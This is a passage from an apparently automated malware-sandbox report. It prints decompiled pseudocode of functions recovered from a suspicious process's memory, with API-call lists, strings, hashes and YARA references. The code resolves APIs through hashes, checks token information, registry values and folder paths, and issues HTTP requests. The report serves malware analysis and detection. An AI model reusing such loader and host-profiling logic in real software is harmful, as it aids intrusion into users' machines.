					_t59 = E0009BF50(__eflags, 0x13, 0x714b685);
					 *_t59(_t99);
					_t104 = 0;
					__eflags = 0;
				} else {
					_v20 = 0;
					_v24 = 4;
					_t61 = E0009BF50(_t132, 0x13, 0x249c261);
					_t82 = E000955C0( *_t61(_t99, 0x20000013,  &_v20,  &_v24, 0), 0) & 0x00000001;
					_t65 = E00095920( &_v24, _v20, E00099D50(0x64740064));
					_t117 = _t117 + 0x1c;
					if((_t82 & _t65) != 0) {
						goto L8;
					}
					_t134 = _t65 & 0x00000001 ^ _t82;
					if((_t65 & 0x00000001 ^ _t82) != 0) {
						goto L8;
					}
					_t104 = _t99;
				}
			}

0x000abad0
0x000abaec
0x000abaf6
0x000abaf8
0x000abb1e
0x000abb2a
0x000abb2d
0x000abb39
0x000abb52
0x000abb65
0x000abb7e
0x000abb89
0x000abb8e
0x000abba3
0x000abba5
0x000abba9
0x000abce1
0x000abce4
0x000abcf5
0x000abcf5
0x000abbaf
0x000abbb2
0x000abbb6
0x000abbb8
0x000abbba
0x000abbc1
0x000abbcf
0x000abbd4
0x000abbdd
0x000abbde
0x000abbdf
0x000abbe1
0x000abbe6
0x000abc00
0x000abc00
0x000abc02
0x000abc0a
0x000abc23
0x000abc28
0x000abc34
0x000abc34
0x000abbe6
0x000abc3d
0x000abc50
0x000abc55
0x000abc60
0x000abc62
0x000abc64
0x000abccd
0x000abcd4
0x000abcdd
0x000abcdf
0x000abcdf
0x000abc66
0x000abc66
0x000abc6d
0x000abc7b
0x000abca5
0x000abcb7
0x000abcbc
0x000abcc1
0x00000000
0x00000000
0x000abcc5
0x000abcc7
0x00000000
0x00000000
0x000abcc9
0x000abcc9

APIs

HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 000ABBA3
HttpSendRequestA.WININET(00000000,00000000,00000013,?,00000000), ref: 000ABC60

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Strings

HHb?, xrefs: 000ABB0B

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: HttpRequest$LibraryLoadOpenSend
String ID: HHb?
API String ID: 1801990682-3770701742
Opcode ID: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction ID: b90c88e23c4269f42729eee88e10057647c254401fe32fbebffa8165428e63bf
Opcode Fuzzy Hash: 146d2e90b6f3af0f737ec5d07bdaf6c45bc14433371efdeeb20c7dcf84d38998
Instruction Fuzzy Hash: 3651C9B2D402197BEF10AAE0EC52FFF76689B51714F050034FE18A6243FB655A1597F2

Uniqueness

Uniqueness Score: -1.00%

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000A1E90(void* __eflags, intOrPtr _a4) {
				short _v440;
				char _v516;
				char _v536;
				char _v1056;
				intOrPtr* _t10;
				void* _t11;
				signed char _t12;
				intOrPtr* _t16;
				intOrPtr* _t18;
				void* _t19;
				intOrPtr* _t20;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t29;
				char* _t32;
				char* _t33;
				void* _t36;
				void* _t38;

				_t10 = E0009BF50(__eflags, 8, 0x3a5687);
				_t32 =  &_v1056;
				_t11 =  *_t10(0, 0x24, 0, 0, _t32); // executed
				_t12 = E000955C0(_t11, 0);
				_t38 = _t36 + 0x10;
				_t48 = _t12 & 0x00000001;
				if((_t12 & 0x00000001) == 0) {
					L7:
					E000A8F20(_a4, E00099D50(0x647400bc));
					__eflags = 0;
					return 0;
				}
				_t16 = E0009BF50(_t48, 3, 0x55e8477);
				 *_t16(_t32);
				_t18 = E0009BF50(_t48, 0, 0xfb8d9e7);
				_t38 = _t38 + 0x10;
				_t33 =  &_v536;
				0;
				while(1) {
					_t19 =  *_t18(_t32, _t33, 0x104); // executed
					_t49 = _t19;
					if(_t19 != 0) {
						break;
					}
					_t23 = E0009BF50(_t49, 3, 0xd0682f7);
					 *_t23(_t32);
					_t25 = E0009BF50(_t49, 3, 0x42c2f97);
					_t38 = _t38 + 0x10;
					_t26 =  *_t25(_t32);
					_t50 = _t26;
					if(_t26 == 0) {
						goto L7;
					}
					_t27 = E00099D50(0x647400af);
					_t29 = E0009BF50(_t50, _t27, E00099D50(0x612a84db));
					 *_t29(_t32);
					_t18 = E0009BF50(_t50, 0, E00099D50(0x6bccd94b));
					_t38 = _t38 + 0x1c;
				}
				__eflags = _v516 - 0x7b;
				if(__eflags != 0) {
					goto L7;
				}
				_v440 = 0;
				_t20 = E0009BF50(__eflags, 0xc, 0xd513d37);
				_t38 = _t38 + 8;
				_t21 =  *_t20( &_v516, _a4);
				__eflags = _t21;
				if(_t21 == 0) {
					return 1;
				}
				goto L7;
			}

0x000a1ea3
0x000a1eab
0x000a1eba
0x000a1ebf
0x000a1ec4
0x000a1ec7
0x000a1ec9
0x000a1faa
0x000a1fbb
0x000a1fc3
0x00000000
0x000a1fc3
0x000a1ed6
0x000a1edf
0x000a1ee8
0x000a1eed
0x000a1ef0
0x000a1efc
0x000a1f00
0x000a1f07
0x000a1f09
0x000a1f0b
0x00000000
0x00000000
0x000a1f14
0x000a1f1d
0x000a1f26
0x000a1f2b
0x000a1f2f
0x000a1f31
0x000a1f33
0x00000000
0x00000000
0x000a1f3a
0x000a1f53
0x000a1f5c
0x000a1f6e
0x000a1f73
0x000a1f73
0x000a1f78
0x000a1f80
0x00000000
0x00000000
0x000a1f88
0x000a1f98
0x000a1f9d
0x000a1fa4
0x000a1fa6
0x000a1fa8
0x00000000
0x000a1fd0
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 000A1EBA

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000104), ref: 000A1F07

Strings

{, xrefs: 000A1F78

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Volume$FolderLibraryLoadMountNamePathPoint
String ID: {
API String ID: 4030958988-366298937
Opcode ID: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction ID: 2801a8096cd9e8e6f79e038ecdb2c579e70d8874028a8c49ff257e7c2f12acb3
Opcode Fuzzy Hash: 4d9ba26b82c6916142059aa598c6103ee44a78b2d8567a0c68f2637733f748d2
Instruction Fuzzy Hash: FC2171B6E843493AFA2132B07C63FFA31585B62B5AF050030FD0C64187FAA5AB5955B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0009BCD0(void* __eflags) {
				void* _t3;
				void* _t4;
				void* _t6;
				intOrPtr* _t8;
				void* _t9;
				intOrPtr* _t10;
				signed int _t11;

				_t3 = E000A9AC0(__eflags, 0xffffffff); // executed
				_t4 = E00097DD0(0xa8);
				_t16 =  ==  ? 0x8026 : 0x801a;
				_t6 = E00099D50(0x647400a4);
				_t8 = E0009BF50(_t3 - _t4, _t6, E00099D50(0x644e562b));
				_t9 =  *_t8(0,  ==  ? 0x8026 : 0x801a, 0, 0, "C:\Users\Albus\AppData\Roaming"); // executed
				if(_t9 == 0) {
					_t10 = E0009BF50(__eflags, 0, 0xfda8b77);
					_t11 =  *_t10(0, "C:\Windows\SysWOW64\msiexec.exe", 0x104);
					__eflags = _t11;
					_t2 = _t11 != 0;
					__eflags = _t2;
					return _t11 & 0xffffff00 | _t2;
				}
				return 0;
			}

0x0009bcd8
0x0009bce7
0x0009bcfb
0x0009bd03
0x0009bd1c
0x0009bd30
0x0009bd34
0x0009bd41
0x0009bd55
0x0009bd57
0x0009bd59
0x0009bd59
0x00000000
0x0009bd59
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,C:\Users\user\AppData\Roaming), ref: 0009BD30

Strings

C:\Users\user\AppData\Roaming, xrefs: 0009BD24
C:\Windows\SysWOW64\msiexec.exe, xrefs: 0009BD4E

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FolderPath
String ID: C:\Users\user\AppData\Roaming$C:\Windows\SysWOW64\msiexec.exe
API String ID: 1514166925-2433609249
Opcode ID: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction ID: a0fe7930ad87ea9ce1ba0dcedcabb489642e65c530b824d5ec864dc6e48fc1b5
Opcode Fuzzy Hash: 1d2181ce6100be1f9ad62c9b501fa46eaf964b88a4ffc4ec71816362a640d2df
Instruction Fuzzy Hash: 88F06296F8621537FA6121B53C13FBB21488BA2B79F190130FA1D991D3F982A91452B7

Uniqueness

Uniqueness Score: -1.00%

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000A8590(void* __eflags, intOrPtr _a4) {
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				union _TOKEN_INFORMATION_CLASS _t22;
				int _t23;
				signed char _t24;
				signed char _t30;
				void* _t31;
				int _t33;
				intOrPtr* _t35;
				signed char* _t36;
				void* _t40;
				intOrPtr* _t41;
				DWORD* _t42;
				signed char* _t43;
				void* _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t61;
				void* _t63;

				_t63 = __eflags;
				_v20 = 0;
				_t16 = E00099D50(0x647400a5);
				_t18 = E0009BF50(_t63, _t16, E00099D50(0x6b5f7e12));
				_t54 = _t51 + 0x10;
				_t19 =  *_t18(_a4, 8,  &_v20);
				_t64 = _t19;
				if(_t19 == 0) {
					_t49 = 0xffffffff;
					L12:
					return _t49;
				}
				E0009BF50(_t64, 9, 0xbd557e);
				_t22 = E00099D50(0x647400b5);
				_t42 =  &_v24;
				_t23 = GetTokenInformation(_v20, _t22, 0, 0, _t42); // executed
				_t24 = E000955C0(_t23, 0);
				_t57 = _t54 + 0x14;
				_t49 = 0xffffffff;
				_t65 = _t24 & 0x00000001;
				if((_t24 & 0x00000001) == 0) {
					L10:
					E0009BF50(_t71, 0, 0xb8e7db5);
					CloseHandle(_v20); // executed
					goto L12;
				}
				_t30 = E000955C0( *((intOrPtr*)(E0009BF50(_t65, 0, E00099D50(0x68042b4e))))(), 0x7a);
				_t57 = _t57 + 0x14;
				if((_t30 & 0x00000001) == 0) {
					goto L10;
				}
				_t31 = E00098290(_v24);
				_t57 = _t57 + 4;
				_t67 = _t31;
				if(_t31 != 0) {
					_t47 = _t31;
					E0009BF50(_t67, 9, 0xbd557e);
					_t61 = _t57 + 8;
					_t33 = GetTokenInformation(_v20, 0x19, _t47, _v24, _t42); // executed
					_t49 = 0xffffffff;
					_t68 = _t33;
					if(_t33 != 0) {
						_t35 = E0009BF50(_t68, 9, 0x8847844);
						_t61 = _t61 + 8;
						_t36 =  *_t35( *_t47);
						if(_t36 != 0) {
							_t70 =  *_t36;
							_t43 = _t36;
							if( *_t36 != 0) {
								_v28 = E0009BF50(_t70, 9, 0x7a1c189);
								_t40 = E000922E0(_t70, ( *_t43 & 0x000000ff) + 0x57d8073d, 0x57d8073e);
								_t61 = _t61 + 0x10;
								_t41 = _v28( *_t47, _t40);
								_t71 = _t41;
								if(_t41 != 0) {
									_t49 =  *_t41;
								}
							}
						}
					}
					E0009B570(_t47);
					_t57 = _t61 + 4;
				}
			}

0x000a8590
0x000a859c
0x000a85a8
0x000a85c1
0x000a85c6
0x000a85d0
0x000a85d2
0x000a85d4
0x000a86f6
0x000a86fb
0x000a8704
0x000a8704
0x000a85e1
0x000a85f3
0x000a85fb
0x000a8605
0x000a860a
0x000a860f
0x000a8612
0x000a8617
0x000a8619
0x000a86e0
0x000a86e7
0x000a86f2
0x00000000
0x000a86f2
0x000a863c
0x000a8641
0x000a8646
0x00000000
0x00000000
0x000a864f
0x000a8654
0x000a8657
0x000a8659
0x000a865f
0x000a8668
0x000a866d
0x000a867a
0x000a867c
0x000a8681
0x000a8683
0x000a868c
0x000a8691
0x000a8696
0x000a869a
0x000a869c
0x000a869f
0x000a86a1
0x000a86b2
0x000a86c3
0x000a86c8
0x000a86ce
0x000a86d1
0x000a86d3
0x000a86d5
0x000a86d5
0x000a86d3
0x000a86a1
0x000a869a
0x000a86d8
0x000a86dd
0x000a86dd

APIs

GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 000A8605
CloseHandle.KERNEL32(00000000), ref: 000A86F2

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Part of subcall function 00098290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000982E8

GetTokenInformation.KERNELBASE(00000000,00000019,00000000,?,?), ref: 000A867A

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: InformationToken$AllocateCloseHandleHeapLibraryLoad
String ID:
API String ID: 3980138298-0
Opcode ID: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction ID: ba9c5bada06ca04430abcedf7208d6edaf5fe3ce74e2084dd3272b17d58d7bd4
Opcode Fuzzy Hash: be7c8878f23a89422498d23321ab4c7132d28cdc27a174f3599f9b84b0b169a4
Instruction Fuzzy Hash: 053182A6E402053BFA1126B46D53BBE35585B52769F090030FD18B52D3FA91AE1497B3

Uniqueness

Uniqueness Score: -1.00%

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0009A5E0(WCHAR* _a4, void** _a8, void* _a12) {
				void* _v12;
				char _v20;
				intOrPtr _v24;
				void* _v28;
				long _v32;
				void* _t21;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void** _t42;
				signed int _t43;
				void* _t46;
				void* _t49;
				void* _t51;
				void* _t52;

				_t42 = _a8;
				E0009BF50(_t52, 0, 0xad68947);
				_t46 = (_t43 & 0xfffffff8) - 0x10 + 8;
				_t40 =  ==  ? 1 : 7;
				_t21 = CreateFileW(_a4, 0x80000000,  ==  ? 1 : 7, 0, 3, 0, 0); // executed
				_t54 = _t21 - 0xffffffff;
				_t42[2] = _t21;
				if(_t21 == 0xffffffff) {
					L4:
					_t22 = 0;
				} else {
					_t24 = E0009BF50(_t54, 0, E00099D50(0x651fdb24));
					_t49 = _t46 + 0xc;
					_push( &_v20);
					_push(_t42[2]);
					if( *_t24() == 0) {
						L3:
						_t26 = E0009BF50(_t56, 0, 0xb8e7db5);
						 *_t26(_t42[2]);
						goto L4;
					} else {
						_t56 = _v24;
						if(_v24 == 0) {
							_t28 = _v28;
							__eflags = _t28;
							_t42[1] = _t28;
							if(__eflags == 0) {
								 *_t42 = 0;
								_t22 = 1;
							} else {
								E0009BF50(__eflags, 0, 0x1f8cae3);
								_t49 = _t49 + 8;
								_t30 = VirtualAlloc(0, _t42[1], 0x3000, 4); // executed
								__eflags = _t30;
								 *_t42 = _t30;
								if(__eflags == 0) {
									goto L3;
								} else {
									E0009BF50(__eflags, 0, 0xb7ac9a5);
									_t51 = _t49 + 8;
									_t32 = ReadFile(_t42[2],  *_t42, _t42[1],  &_v32, 0); // executed
									__eflags = _t32;
									if(__eflags == 0) {
										L12:
										_t33 = E0009BF50(__eflags, 0, 0xb1fd105);
										_t49 = _t51 + 8;
										 *_t33( *_t42, 0, 0x8000);
										goto L3;
									} else {
										__eflags = _v32 - _t42[1];
										if(__eflags != 0) {
											goto L12;
										} else {
											_t22 = 1;
										}
									}
								}
							}
						} else {
							goto L3;
						}
					}
				}
				return _t22;
			}

0x0009a5eb
0x0009a5f8
0x0009a5fd
0x0009a60e
0x0009a620
0x0009a622
0x0009a625
0x0009a628
0x0009a66b
0x0009a66b
0x0009a62a
0x0009a63a
0x0009a63f
0x0009a646
0x0009a647
0x0009a64e
0x0009a657
0x0009a65e
0x0009a669
0x00000000
0x0009a650
0x0009a650
0x0009a655
0x0009a674
0x0009a678
0x0009a67a
0x0009a67d
0x0009a6d3
0x0009a6d9
0x0009a67f
0x0009a686
0x0009a68b
0x0009a69a
0x0009a69c
0x0009a69e
0x0009a6a0
0x00000000
0x0009a6a2
0x0009a6a9
0x0009a6ae
0x0009a6c0
0x0009a6c2
0x0009a6c4
0x0009a6dd
0x0009a6e4
0x0009a6e9
0x0009a6f5
0x00000000
0x0009a6c6
0x0009a6ca
0x0009a6cd
0x00000000
0x0009a6cf
0x0009a6cf
0x0009a6cf
0x0009a6cd
0x0009a6c4
0x0009a6a0
0x00000000
0x00000000
0x00000000
0x0009a655
0x0009a64e
0x0009a673

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0009A620
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0009A69A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0009A6C0

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: File$AllocCreateReadVirtual
String ID:
API String ID: 3585551309-0
Opcode ID: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction ID: a72eb89c18b470897a678f10b6653c5c1a7be55482207ed17d97ff94bdca1790
Opcode Fuzzy Hash: 8a16c999e614f2cb2d15439e8a71d5afc7428100335bed1b89921a0e8067ef3d
Instruction Fuzzy Hash: 2431F571744701BBEF216B60DC13F6A76D09B42B11F184828FAAD961D1E7B1F510EAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0009ABF0(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
				void* _t11;
				signed char _t12;
				long _t14;
				signed int _t29;
				void* _t38;

				_t12 = E000A5000(_t11, _t38, 0xffffffff);
				E0009BF50(_t38, 9, 0xda29a27);
				_t14 = RegOpenKeyExW(_a4, _a8, 0, (_t12 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t29 = 0xffffffff;
				_t39 = _t14;
				if(_t14 == 0) {
					E0009BF50(_t39, 9, 0x8097c7);
					RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24); // executed
					asm("sbb esi, esi");
					_t29 =  !0x00000000 | _a24;
					E0009BF50( !0x00000000, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				}
				return _t29;
			}

0x0009abfe
0x0009ac16
0x0009ac27
0x0009ac29
0x0009ac2e
0x0009ac30
0x0009ac42
0x0009ac56
0x0009ac5d
0x0009ac61
0x0009ac6b
0x0009ac76
0x0009ac76
0x0009ac7e

APIs

RegOpenKeyExW.KERNEL32(00000000,?,00000000,?,?), ref: 0009AC27
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?,?,?), ref: 0009AC56

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

RegCloseKey.KERNEL32(?,?,?,?,?), ref: 0009AC76

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseLibraryLoadOpenQueryValue
String ID:
API String ID: 3751545530-0
Opcode ID: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction ID: 711e3e43aad391e08f1cf9e3f977c3c6a261da2600694e1e7e3509716ed60c4c
Opcode Fuzzy Hash: 0e8ffc89672215796fecbd1346c7872432632bc6830220a73860a93601033418
Instruction Fuzzy Hash: 6D0144779402287BDF109E959C42FEA3758DB45B75F050224FE28A72C2E6A1BD1187F1

Uniqueness

Uniqueness Score: -1.00%

Function 0009E030, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0009E030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E000A5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E0009BF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E0009BF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					E0009BF50(_t7, 9, 0x3111c69);
					RegCloseKey(_a4); // executed
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x0009e030
0x0009e04c
0x0009e056
0x0009e067
0x0009e06b
0x0009e07b
0x0009e08f
0x0009e091
0x0009e093
0x0009e093
0x0009e093
0x0009e09d
0x0009e0a8
0x0009e06d
0x0009e06d
0x0009e06d
0x0009e0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 0009E067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 0009E08F
RegCloseKey.KERNEL32(?,?,?,?,?,?,?,?), ref: 0009E0A8

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: 78661935677944fcadbb7ef02a500823dea520f1cf60ceb67f17524cb1b54881
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: 3601F9776803183EEF1059A5AC53FEA3608DB81B65F140130FE1CAA1C3EAD1FA1596F1

Uniqueness

Uniqueness Score: -1.00%

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E000A4680(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v52;
				char _v64;
				intOrPtr _v72;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				char _v136;
				char _v148;
				char _v160;
				char _v172;
				char _v184;
				char _v196;
				char _v208;
				char _v220;
				char _v232;
				char _v248;
				char _v266;
				char _v306;
				char _v528;
				char _v1048;
				void* _t171;
				void* _t173;
				void* _t175;
				intOrPtr* _t177;
				void* _t178;
				intOrPtr _t179;
				signed int _t229;
				signed int _t233;
				void* _t236;
				void* _t238;
				void* _t244;
				void* _t252;
				signed int _t254;
				void* _t263;
				void* _t269;
				void* _t276;
				intOrPtr _t279;
				signed int _t287;
				void* _t288;
				void* _t290;
				void* _t293;
				signed char _t299;
				void* _t314;
				signed int _t319;
				void* _t321;
				signed int _t323;
				signed int _t325;
				WCHAR* _t327;
				signed int _t329;
				void* _t339;
				signed int _t341;
				void* _t342;
				void* _t343;
				signed int _t350;
				signed int _t353;
				intOrPtr _t368;
				intOrPtr _t404;
				signed int _t487;
				intOrPtr _t488;
				signed int _t489;
				intOrPtr _t490;
				signed int _t499;
				intOrPtr _t512;
				signed int _t513;
				void* _t530;
				void* _t531;
				void* _t535;
				void* _t593;
				void* _t604;
				void* _t606;
				void* _t609;

				_t171 = E000A7EE0(__eflags, 0xa20123ac, 1, 0xffffffff); // executed
				_t531 = _t530 + 0xc;
				_t611 = _t171;
				if(_t171 == 0) {
					L2:
					_t350 = 0;
				} else {
					_t173 = E000A9AC0(_t611, 0xffffffff); // executed
					_t473 =  ==  ? 0x8026 : 0x801a;
					_t175 = E00099D50(0x647400a4);
					_t177 = E0009BF50(_t173 - 4, _t175, E00099D50(0x644e562b));
					_t535 = _t531 + 0x14;
					_t351 =  &_v1048;
					_t178 =  *_t177(0,  ==  ? 0x8026 : 0x801a, 0, 0,  &_v1048); // executed
					if(_t178 == 0) {
						_t179 = E00098290(0x3d0);
						_t510 = _t179;
						E000A1E90(__eflags, _t179 + 0xc); // executed
						_t2 = _t510 + 0x1c; // 0x1c, executed
						E000A3BC0(_t2, __eflags);
						_t3 = _t510 + 0xe6; // 0xe6
						E00095CD0(__eflags, 2, _t3, 4, 8);
						_t4 = _t510 + 0xf8; // 0xf8
						E0009A980(_t4); // executed
						E000AF740( &_v64);
						__eflags = _a8;
						_t375 =  !=  ? 0xb0bf2 : 0xb051c;
						E000A5180( &_v1048,  &_v64, E00097200( !=  ? 0xb0bf2 : 0xb051c,  &_v528), 0); // executed
						E000AF740( &_v232);
						E000A5180( &_v1048,  &_v232, 0, 0); // executed
						E000AF740( &_v220);
						E000A5180( &_v1048,  &_v220, 0, 0); // executed
						E000AF740( &_v208);
						E000A5180( &_v1048,  &_v208, 0, 0); // executed
						E000AF740( &_v196);
						E000A5180(_t351,  &_v196, 0, 0); // executed
						E000AF740( &_v184);
						E000A5180(_t351,  &_v184, 0, 1); // executed
						E000AF740( &_v172);
						E000A5180(_t351,  &_v172, 0, 1); // executed
						E000AF740( &_v160);
						E000A5180(_t351,  &_v160, 0, 0); // executed
						E000AF740( &_v148);
						E000A5180(_t351,  &_v148, 0, 0); // executed
						E000AF740( &_v136);
						E000A5180(_t351,  &_v136, 0, 0); // executed
						E000AF740( &_v124);
						E000A5180(_t351,  &_v124, 0, 0); // executed
						E000AF740( &_v112);
						E000A5180(_t351,  &_v112, 0, 0); // executed
						E000AF740( &_v100);
						E000A5180(_t351,  &_v100, 0, 0); // executed
						_t487 =  &_v88;
						E000AF740(_t487);
						_t470 = _t487;
						E000A5180(_t351, _t487, 0, 0); // executed
						E000921E0(2, 0x80000001, E00097200(0xb09d0,  &_v306),  &_v266, 4, 8); // executed
						_t404 = _t179;
						_t23 = _t404 + 0x3be; // 0x3be
						_t488 = _t404;
						_v24 = _t404;
						E0009D4F0(_t487, 0, _t23, 4, 8);
						_t25 = _t488 + 0x3c7; // 0x3c7
						E0009D4F0(_t487, 0, _t25, 4, 8);
						_t489 = E000922E0(__eflags, E0009BA30(__eflags, _t351), 0xffffffff);
						_t229 = E0009EC30(E000AFCF0( &_v64) + _t489 * 2, 0xffffffff, _t179 + 0x1fe, 0x20);
						_t512 = _v24;
						__eflags = _t229;
						_t353 = 0 | _t229 == 0x00000000;
						_v20 = _t512 + 0x25e;
						_t233 = E0009EC30(E000AFCF0( &_v232) + _t489 * 2, 0xffffffff, _v20, 0x20);
						_t38 = _t353 + 1; // 0x1
						__eflags = _t233;
						_t513 = _t512 + 0x27e;
						_t408 =  !=  ? _t353 : _t38;
						_v20 =  !=  ? _t353 : _t38;
						_t236 = E0009EC30(E000AFCF0( &_v220) + _t489 * 2, 0xffffffff, _t513, 0x20);
						_t490 = _v24;
						__eflags = _t236 - 1;
						asm("sbb esi, esi");
						_v28 = _t490 + 0x29e;
						_t238 = E000AFCF0( &_v208);
						_v32 = _t489;
						__eflags = E0009EC30(_t238 + _t489 * 2, 0xffffffff, _v28, 0x20) - 1;
						asm("sbb esi, [ebp-0x10]");
						_v28 =  ~_t513;
						_v20 = _t490 + 0x2be;
						_t244 = E000AFCF0( &_v196);
						__eflags = E0009EC30(_t244 + _t489 * 2, 0xffffffff, _v20, E00099D50(0x6474008c));
						_t356 = 0 | __eflags == 0x00000000;
						_v20 = E00091460(__eflags, _t513,  ~(__eflags == 0));
						E00091460(__eflags, _v28, _t356);
						_t252 = E000AFCF0( &_v184);
						_t254 = E0009EC30(_t252 + _v32 * 2, 0xffffffff, _v24 + 0x21e, E00099D50(0x6474008c));
						__eflags = _t254;
						_v28 = E00099D50(0x59d06af4);
						_v36 = _v24 + 0x23e;
						_v36 = E0009EC30(E000AFCF0( &_v172) + _v32 * 2, 0xffffffff, _v36, 0x20);
						_v40 = E00099D50(0xe4894f31);
						_t263 = E0009EC30(E000AFCF0( &_v160) + _v32 * 2, 0xffffffff, _v24 + 0x2de, 0x20);
						__eflags = _v36 - 1;
						asm("adc ebx, 0x0");
						__eflags = _t263 - 1;
						asm("adc ebx, 0x0");
						__eflags = E0009EC30(E000AFCF0( &_v148) + _v32 * 2, 0xffffffff, _v24 + 0x2fe, 0x20);
						_t419 = 0 | __eflags == 0x00000000;
						_v20 = (_t254 == 0) - _v28 + _v20 + _v40 - 0x4358e545;
						_t269 = E00091460(__eflags, (_t254 == 0) - _v28 + _v20 + _v40 + 0xddcba449, __eflags == 0);
						E00091460(__eflags, _v20, _t419);
						_v20 = _v24 + 0x31e;
						__eflags = E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20);
						_v20 = E00091460(E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20), _t269 + 0xdedb7672, 0 | E0009EC30(E000AFCF0( &_v136) + _v32 * 2, 0xffffffff, _v20, 0x20) == 0x00000000);
						_t276 = E000AFCF0( &_v124);
						__eflags = E0009EC30(_t276 + _v32 * 2, 0xffffffff, _v24 + 0x33e, E00099D50(0x6474008c));
